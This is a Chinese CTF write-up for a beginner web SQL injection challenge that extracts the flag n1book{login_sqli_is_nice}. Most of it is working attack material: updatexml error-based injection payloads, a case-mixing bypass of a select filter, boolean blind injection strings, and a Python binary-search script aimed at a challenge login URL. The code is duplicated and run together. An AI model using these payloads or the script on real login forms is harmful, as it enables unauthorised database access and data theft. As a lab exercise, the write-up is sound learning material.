![[第一章 web入门]SQL注入-2,网络安全爱好者中心-神域博客网](https://img.godyu.com/2023/10/hack1.jpg)
1 通过updatexml取数据
从页面发现有一个提示
如果加上?tips=1的话,通过burpsuite发包可以通过updatexml来查看回显,可以通过这个取到数据
下面是通过updatexml来注入,这时4步中用到语句
name=admin\' and updatexml(1,concat(0x7e,(select(database())),0x7e),1) #&pass=bbname=admin\' and updatexml(1,concat(0x7e,(selEct(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1) #&pass=bbname=admin\'’ and updatexml(1,concat(0x7e,(seLect(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘fl4g’)),0x7e),1) #&pass=bbname=admin’ and updatexml(1,concat(0x7e,(selEct(flag)from(fl4g)),0x7e),1) #&pass=bbname=admin\' and updatexml(1,concat(0x7e,(select(database())),0x7e),1) #&pass=bb name=admin\' and updatexml(1,concat(0x7e,(selEct(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1) #&pass=bb name=admin\'’ and updatexml(1,concat(0x7e,(seLect(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘fl4g’)),0x7e),1) #&pass=bb name=admin’ and updatexml(1,concat(0x7e,(selEct(flag)from(fl4g)),0x7e),1) #&pass=bbname=admin\' and updatexml(1,concat(0x7e,(select(database())),0x7e),1) #&pass=bb name=admin\' and updatexml(1,concat(0x7e,(selEct(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1) #&pass=bb name=admin\'’ and updatexml(1,concat(0x7e,(seLect(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘fl4g’)),0x7e),1) #&pass=bb name=admin’ and updatexml(1,concat(0x7e,(selEct(flag)from(fl4g)),0x7e),1) #&pass=bb
这里的难点在于屏蔽了select,通过updatexml的回显,在select附近会报错,通过报错来分析出select被屏蔽。从测试可以发现,应该是屏蔽了select SELECT。
第一个取数据库名称的语句中,select未出错,是因为这个select过滤后不影响语句执行
2 通过sqlmap测试
通过sqlmap测试发现,可以取数据库名,表名,字段名,但无法爆破出字段内容。
3 通过盲注来取数据
测试发现用户名输入admin话,报错:用户名密码错误,否则报用户名不存在。
盲注的话,可以根据这个来判断
判断库名
admina\' or ascii(substr((select(database())),66,1))>10admina\' or ascii(substr((select(database())),66,1))>10admina\' or ascii(substr((select(database())),66,1))>10
判断表名
admina\' or ascii(substr((selEct(group_concat(table_name))from(information_schema.tables)where(table_schema=“note”)),1,1))>101 #admina\' or ascii(substr((selEct(group_concat(table_name))from(information_schema.tables)where(table_schema=“note”)),1,1))>101 #admina\' or ascii(substr((selEct(group_concat(table_name))from(information_schema.tables)where(table_schema=“note”)),1,1))>101 #
下面是盲注的代码
import requestsurl =“http://82625ff6-908a-4e21-b367-46168b8a77fe.node4.buuoj.cn/login.php”flag = ‘’def payload(i,j):#myname=\"admin\' and ascii(substr((selEct(database())),\"+str(j)+\",1))>\"+str(i)+\" #\"#myname=\"admin\' and ascii(substr((selEct(group_concat(table_name))from(information_schema.tables)where(table_schema=\'note\')),\"+str(j)+\",1))>\"+str(i)+\" #\"#myname=\"admin\' and ascii(substr((selEct(group_concat(column_name))from(information_schema.columns)where(table_name=\'fl4g\')),\"+str(j)+\",1))>\"+str(i)+\" #\"myname=\"admin\' and ascii(substr((selEct(group_concat(flag))from(note.fl4g)),\"+str(j)+\",1))>\"+str(i)+\" #\"cs = {\'name\': myname,\"pass\":\"bb\"}html=requests.post(url,data=cs)#print myname#print(html)#print(html.text)if( \"u8bef\" in html.text ):res = 1else:res = 0return resimport requests url =“http://82625ff6-908a-4e21-b367-46168b8a77fe.node4.buuoj.cn/login.php” flag = ‘’ def payload(i,j): #myname=\"admin\' and ascii(substr((selEct(database())),\"+str(j)+\",1))>\"+str(i)+\" #\" #myname=\"admin\' and ascii(substr((selEct(group_concat(table_name))from(information_schema.tables)where(table_schema=\'note\')),\"+str(j)+\",1))>\"+str(i)+\" #\" #myname=\"admin\' and ascii(substr((selEct(group_concat(column_name))from(information_schema.columns)where(table_name=\'fl4g\')),\"+str(j)+\",1))>\"+str(i)+\" #\" myname=\"admin\' and ascii(substr((selEct(group_concat(flag))from(note.fl4g)),\"+str(j)+\",1))>\"+str(i)+\" #\" cs = {\'name\': myname,\"pass\":\"bb\"} html=requests.post(url,data=cs) #print myname #print(html) #print(html.text) if( \"u8bef\" in html.text ): res = 1 else: res = 0 return resimport requests url =“http://82625ff6-908a-4e21-b367-46168b8a77fe.node4.buuoj.cn/login.php” flag = ‘’ def payload(i,j): #myname=\"admin\' and ascii(substr((selEct(database())),\"+str(j)+\",1))>\"+str(i)+\" #\" #myname=\"admin\' and ascii(substr((selEct(group_concat(table_name))from(information_schema.tables)where(table_schema=\'note\')),\"+str(j)+\",1))>\"+str(i)+\" #\" #myname=\"admin\' and ascii(substr((selEct(group_concat(column_name))from(information_schema.columns)where(table_name=\'fl4g\')),\"+str(j)+\",1))>\"+str(i)+\" #\" myname=\"admin\' and ascii(substr((selEct(group_concat(flag))from(note.fl4g)),\"+str(j)+\",1))>\"+str(i)+\" #\" cs = {\'name\': myname,\"pass\":\"bb\"} html=requests.post(url,data=cs) #print myname #print(html) #print(html.text) if( \"u8bef\" in html.text ): res = 1 else: res = 0 return res
#judge if is 0def payload2(j,i):#myname=\"admin\' and ascii(substr((select(database())),\"+str(j)+\",1))=0 #\"#myname=\"admin\' and ascii(substr((selEct(group_concat(table_name))from(information_schema.tables)where(table_schema=\'note\')),\"+str(j)+\",1))=0 #\"#myname=\"admin\' and ascii(substr((selEct(group_concat(column_name))from(information_schema.columns)where(table_name=\'fl4g\')),\"+str(j)+\",1))=0 #\"myname=\"admin\' and ascii(substr((selEct(group_concat(flag))from(note.fl4g)),\"+str(j)+\",1))=0 #\"cs = {\'name\': myname,\"pass\":\"bb\"}html=requests.post(url,data=cs)#print(html)#print(html.text)if( \"u8bef\" in html.text ):res = 1else:res = 0return res#judge if is 0 def payload2(j,i): #myname=\"admin\' and ascii(substr((select(database())),\"+str(j)+\",1))=0 #\" #myname=\"admin\' and ascii(substr((selEct(group_concat(table_name))from(information_schema.tables)where(table_schema=\'note\')),\"+str(j)+\",1))=0 #\" #myname=\"admin\' and ascii(substr((selEct(group_concat(column_name))from(information_schema.columns)where(table_name=\'fl4g\')),\"+str(j)+\",1))=0 #\" myname=\"admin\' and ascii(substr((selEct(group_concat(flag))from(note.fl4g)),\"+str(j)+\",1))=0 #\" cs = {\'name\': myname,\"pass\":\"bb\"} html=requests.post(url,data=cs) #print(html) #print(html.text) if( \"u8bef\" in html.text ): res = 1 else: res = 0 return res#judge if is 0 def payload2(j,i): #myname=\"admin\' and ascii(substr((select(database())),\"+str(j)+\",1))=0 #\" #myname=\"admin\' and ascii(substr((selEct(group_concat(table_name))from(information_schema.tables)where(table_schema=\'note\')),\"+str(j)+\",1))=0 #\" #myname=\"admin\' and ascii(substr((selEct(group_concat(column_name))from(information_schema.columns)where(table_name=\'fl4g\')),\"+str(j)+\",1))=0 #\" myname=\"admin\' and ascii(substr((selEct(group_concat(flag))from(note.fl4g)),\"+str(j)+\",1))=0 #\" cs = {\'name\': myname,\"pass\":\"bb\"} html=requests.post(url,data=cs) #print(html) #print(html.text) if( \"u8bef\" in html.text ): res = 1 else: res = 0 return res
def exp():global flagj=1i=1myend = Falsewhile(True):if (payload2(j,0) == 1):break;low=31high=127while(True):ave = (low+high)/2print “ave is”,averet = payload(ave,j)if (ret == 1):low = aveelse:high = aveif (high-low==1):print \"the \", j, \" station is \" , chr(high)flag = flag + chr(high)breakj=j+1def exp(): global flag j=1 i=1 myend = False while(True): if (payload2(j,0) == 1): break; low=31 high=127 while(True): ave = (low+high)/2 print “ave is”,ave ret = payload(ave,j) if (ret == 1): low = ave else: high = ave if (high-low==1): print \"the \", j, \" station is \" , chr(high) flag = flag + chr(high) break j=j+1def exp(): global flag j=1 i=1 myend = False while(True): if (payload2(j,0) == 1): break; low=31 high=127 while(True): ave = (low+high)/2 print “ave is”,ave ret = payload(ave,j) if (ret == 1): low = ave else: high = ave if (high-low==1): print \"the \", j, \" station is \" , chr(high) flag = flag + chr(high) break j=j+1
exp()#payload(100,1)#payload(150,1)print(‘flag=’,flag)#(‘flag=’, ‘fl4g,users’)#(‘flag=’, ‘n1book{login_sqli_is_nice}’)exp() #payload(100,1) #payload(150,1) print(‘flag=’,flag) #(‘flag=’, ‘fl4g,users’) #(‘flag=’, ‘n1book{login_sqli_is_nice}’)exp() #payload(100,1) #payload(150,1) print(‘flag=’,flag) #(‘flag=’, ‘fl4g,users’) #(‘flag=’, ‘n1book{login_sqli_is_nice}’)
所以最终flag为n1book{login_sqli_is_nice}
THE END
暂无评论内容